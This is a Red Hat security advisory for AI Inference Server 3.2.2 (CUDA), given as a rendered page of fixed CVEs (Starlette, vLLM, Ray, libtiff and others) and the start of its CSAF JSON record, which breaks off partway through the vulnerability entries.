Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A denial of service vulnerability has been discovered in the python Starlette framework. an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This induces CPU exhaustion per request, causing a denial‑of‑service for endpoints serving files.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A remote code execution vulnerability has been identified in vLLM. An attacker can exploit a weakness in the model loading process to silently fetch and run unauthorized, malicious Python code on the host system. This happens because the engine mistakenly executes code from a remote repository referenced in a model's configuration, even when explicit security measures are set to prevent it.
7.5 (High)
Affected products
Fixed
2 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
147 references
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2025:23078 | self |
| https://access.redhat.com/security/cve/CVE-2023-48022 | external |
| https://access.redhat.com/security/cve/CVE-2023-52355 | external |
| https://access.redhat.com/security/cve/CVE-2023-52356 | external |
| https://access.redhat.com/security/cve/CVE-2024-56433 | external |
| https://access.redhat.com/security/cve/CVE-2025-22868 | external |
| https://access.redhat.com/security/cve/CVE-2025-22869 | external |
| https://access.redhat.com/security/cve/CVE-2025-52565 | external |
| https://access.redhat.com/security/cve/CVE-2025-5318 | external |
| https://access.redhat.com/security/cve/CVE-2025-53905 | external |
| https://access.redhat.com/security/cve/CVE-2025-53906 | external |
| https://access.redhat.com/security/cve/CVE-2025-59375 | external |
| https://access.redhat.com/security/cve/CVE-2025-59425 | external |
| https://access.redhat.com/security/cve/CVE-2025-6242 | external |
| https://access.redhat.com/security/cve/CVE-2025-62593 | external |
| https://access.redhat.com/security/cve/CVE-2025-62727 | external |
| https://access.redhat.com/security/cve/CVE-2025-66448 | external |
| https://access.redhat.com/security/cve/CVE-2025-6965 | external |
| https://access.redhat.com/security/cve/CVE-2025-8176 | external |
| https://access.redhat.com/security/cve/CVE-2025-9230 | external |
| https://access.redhat.com/security/cve/CVE-2025-9900 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://www.redhat.com/en/products/ai/inference-server | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2023-48022 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2387122 | external |
| https://www.cve.org/CVERecord?id=CVE-2023-48022 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2023-48022 | external |
| https://access.redhat.com/security/cve/CVE-2023-52355 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2251326 | external |
| https://www.cve.org/CVERecord?id=CVE-2023-52355 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2023-52355 | external |
| https://gitlab.com/libtiff/libtiff/-/issues/621 | external |
| https://access.redhat.com/security/cve/CVE-2023-52356 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2251344 | external |
| https://www.cve.org/CVERecord?id=CVE-2023-52356 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2023-52356 | external |
| https://gitlab.com/libtiff/libtiff/-/issues/622 | external |
| https://gitlab.com/libtiff/libtiff/-/merge_requests/546 | external |
| https://access.redhat.com/security/cve/CVE-2024-56433 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2334165 | external |
| https://www.cve.org/CVERecord?id=CVE-2024-56433 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2024-56433 | external |
| https://github.com/shadow-maint/shadow/blob/e2512… | external |
| https://github.com/shadow-maint/shadow/issues/1157 | external |
| https://github.com/shadow-maint/shadow/releases/tag/4.4 | external |
| https://access.redhat.com/security/cve/CVE-2025-5318 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2369131 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-5318 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-5318 | external |
| https://www.libssh.org/security/advisories/CVE-20… | external |
| https://access.redhat.com/security/cve/CVE-2025-6242 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2373716 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-6242 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-6242 | external |
| https://github.com/vllm-project/vllm/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2025-6965 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2380149 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-6965 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-6965 | external |
| https://www.oracle.com/security-alerts/cpujan2026… | external |
| https://www.sqlite.org/src/info/5508b56fd24016c13… | external |
| https://access.redhat.com/security/cve/CVE-2025-8176 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2383598 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-8176 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-8176 | external |
| http://www.libtiff.org/ | external |
| https://gitlab.com/libtiff/libtiff/-/commit/fe108… | external |
| https://gitlab.com/libtiff/libtiff/-/issues/707 | external |
| https://gitlab.com/libtiff/libtiff/-/merge_requests/727 | external |
| https://vuldb.com/?ctiid.317590 | external |
| https://vuldb.com/?id.317590 | external |
| https://vuldb.com/?submit.621796 | external |
| https://access.redhat.com/security/cve/CVE-2025-9230 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2396054 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9230 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9230 | external |
| https://access.redhat.com/security/cve/CVE-2025-9900 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2392784 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9900 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9900 | external |
| https://github.com/SexyShoelessGodofWar/LibTiff-4… | external |
| https://gitlab.com/libtiff/libtiff/-/issues/704 | external |
| https://gitlab.com/libtiff/libtiff/-/merge_requests/732 | external |
| https://libtiff.gitlab.io/libtiff/releases/v4.7.1.html | external |
| https://access.redhat.com/security/cve/CVE-2025-22868 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2348366 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-22868 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-22868 | external |
| https://go.dev/cl/652155 | external |
| https://go.dev/issue/71490 | external |
| https://pkg.go.dev/vuln/GO-2025-3488 | external |
| https://access.redhat.com/security/cve/CVE-2025-22869 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2348367 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-22869 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-22869 | external |
| https://go.dev/cl/652135 | external |
| https://go.dev/issue/71931 | external |
| https://pkg.go.dev/vuln/GO-2025-3487 | external |
| https://access.redhat.com/security/cve/CVE-2025-52565 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2404708 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-52565 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-52565 | external |
| https://github.com/opencontainers/runc/security/a… | external |
| https://access.redhat.com/security/cve/CVE-2025-53905 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2380362 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-53905 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-53905 | external |
| https://github.com/vim/vim/commit/87757c6b0a4b2c1… | external |
| https://github.com/vim/vim/security/advisories/GH… | external |
| https://access.redhat.com/security/cve/CVE-2025-53906 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2380360 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-53906 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-53906 | external |
| https://github.com/vim/vim/commit/586294a04179d85… | external |
| https://github.com/vim/vim/security/advisories/GH… | external |
| https://access.redhat.com/security/cve/CVE-2025-59375 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2395108 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-59375 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-59375 | external |
| https://www.mozilla.org/security/advisories/mfsa2… | external |
| https://www.mozilla.org/security/advisories/mfsa2… | external |
| https://access.redhat.com/security/cve/CVE-2025-59425 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2397234 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-59425 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-59425 | external |
| https://github.com/vllm-project/vllm/commit/ee10d… | external |
| https://github.com/vllm-project/vllm/security/adv… | external |
| https://access.redhat.com/security/cve/CVE-2025-62593 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2417394 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-62593 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-62593 | external |
| https://github.com/ray-project/ray/commit/70e7c72… | external |
| https://github.com/ray-project/ray/security/advis… | external |
| https://access.redhat.com/security/cve/CVE-2025-62727 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2406929 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-62727 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-62727 | external |
| https://github.com/Kludex/starlette/commit/4ea6e2… | external |
| https://github.com/Kludex/starlette/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2025-66448 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2418152 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-66448 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-66448 | external |
| https://github.com/vllm-project/vllm/commit/ffb08… | external |
| https://github.com/vllm-project/vllm/pull/28126 | external |
| https://github.com/vllm-project/vllm/security/adv… | external |
Acknowledgments
Ronald Crane
AnchorSec Ltd.
Gareth C
jub0bs
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AI Inference Server 3.2.2 (CUDA) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat\u00ae AI Inference Server",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:23078",
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-48022",
"url": "https://access.redhat.com/security/cve/CVE-2023-48022"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-52355",
"url": "https://access.redhat.com/security/cve/CVE-2023-52355"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-52356",
"url": "https://access.redhat.com/security/cve/CVE-2023-52356"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2024-56433",
"url": "https://access.redhat.com/security/cve/CVE-2024-56433"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-22868",
"url": "https://access.redhat.com/security/cve/CVE-2025-22868"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-22869",
"url": "https://access.redhat.com/security/cve/CVE-2025-22869"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-52565",
"url": "https://access.redhat.com/security/cve/CVE-2025-52565"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-5318",
"url": "https://access.redhat.com/security/cve/CVE-2025-5318"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53905",
"url": "https://access.redhat.com/security/cve/CVE-2025-53905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53906",
"url": "https://access.redhat.com/security/cve/CVE-2025-53906"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59375",
"url": "https://access.redhat.com/security/cve/CVE-2025-59375"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59425",
"url": "https://access.redhat.com/security/cve/CVE-2025-59425"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6242",
"url": "https://access.redhat.com/security/cve/CVE-2025-6242"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62593",
"url": "https://access.redhat.com/security/cve/CVE-2025-62593"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62727",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-66448",
"url": "https://access.redhat.com/security/cve/CVE-2025-66448"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-6965",
"url": "https://access.redhat.com/security/cve/CVE-2025-6965"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-8176",
"url": "https://access.redhat.com/security/cve/CVE-2025-8176"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9230",
"url": "https://access.redhat.com/security/cve/CVE-2025-9230"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9900",
"url": "https://access.redhat.com/security/cve/CVE-2025-9900"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://www.redhat.com/en/products/ai/inference-server",
"url": "https://www.redhat.com/en/products/ai/inference-server"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_23078.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AI Inference Server 3.2.2 (CUDA)",
"tracking": {
"current_release_date": "2026-05-24T14:51:36+00:00",
"generator": {
"date": "2026-05-24T14:51:36+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2025:23078",
"initial_release_date": "2025-12-10T18:24:36+00:00",
"revision_history": [
{
"date": "2025-12-10T18:24:36+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-10T18:24:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-24T14:51:36+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AI Inference Server 3.2",
"product": {
"name": "Red Hat AI Inference Server 3.2",
"product_id": "Red Hat AI Inference Server 3.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ai_inference_server:3.2::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat AI Inference Server"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"product_id": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-cuda-rhel9@sha256%3Abddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b?arch=amd64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=3.2.2-1765379088"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64",
"product": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64",
"product_id": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64",
"product_identification_helper": {
"purl": "pkg:oci/vllm-cuda-rhel9@sha256%3Aec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab?arch=arm64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=3.2.2-1765379088"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64 as a component of Red Hat AI Inference Server 3.2",
"product_id": "Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64 as a component of Red Hat AI Inference Server 3.2",
"product_id": "Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
},
"product_reference": "registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-48022",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2025-08-07T17:35:20.588000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2387122"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ray. The job submission API allows a remote attacker to execute arbitrary code due to insufficient input validation. An unauthenticated attacker can trigger this vulnerability by sending a malicious job submission request. Successful exploitation results in arbitrary code execution on the affected Ray cluster.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ray: Ray Job Submission Arbitrary Code Execution",
"title": "Vulnerability summary"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-48022"
},
{
"category": "external",
"summary": "RHBZ#2387122",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387122"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-48022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48022"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-48022",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48022"
}
],
"release_date": "2025-08-07T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ray: Ray Job Submission Arbitrary Code Execution"
},
{
"cve": "CVE-2023-52355",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2251326"
}
],
"notes": [
{
"category": "description",
"text": "An out-of-memory flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFRasterScanlineSize64() API. This flaw allows a remote attacker to cause a denial of service via a crafted input with a size smaller than 379 KB.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtiff: TIFFRasterScanlineSize64 produce too-big size and could cause OOM",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The identified out-of-memory vulnerability in libtiff, triggered by a crafted TIFF file passed to the TIFFRasterScanlineSize64() API, presents a moderate severity concern rather than a important one due to several factors. Primarily, the exploit requires the crafted input to be smaller than 379 KB, imposing a limitation on the potential impact and reducing the likelihood of successful exploitation in practical scenarios. Furthermore, the nature of the vulnerability is limited to denial-of-service attacks, which, although disruptive, do not inherently pose a direct risk of data compromise or system compromise. However, it\u0027s important to acknowledge that denial-of-service attacks can still have significant operational implications, particularly in environments reliant on continuous availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-52355"
},
{
"category": "external",
"summary": "RHBZ#2251326",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251326"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-52355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52355"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-52355",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52355"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/issues/621",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/621"
}
],
"release_date": "2023-11-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libtiff: TIFFRasterScanlineSize64 produce too-big size and could cause OOM"
},
{
"cve": "CVE-2023-52356",
"cwe": {
"id": "CWE-122",
"name": "Heap-based Buffer Overflow"
},
"discovery_date": "2023-11-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2251344"
}
],
"notes": [
{
"category": "description",
"text": "A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtiff: Segment fault in libtiff in TIFFReadRGBATileExt() leading to denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw allows an attacker to potentially cause a denial of service attack by crashing a program, but the impact is minimal.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-52356"
},
{
"category": "external",
"summary": "RHBZ#2251344",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251344"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-52356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52356"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-52356",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52356"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/issues/622",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/622"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/merge_requests/546",
"url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/546"
}
],
"release_date": "2023-11-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
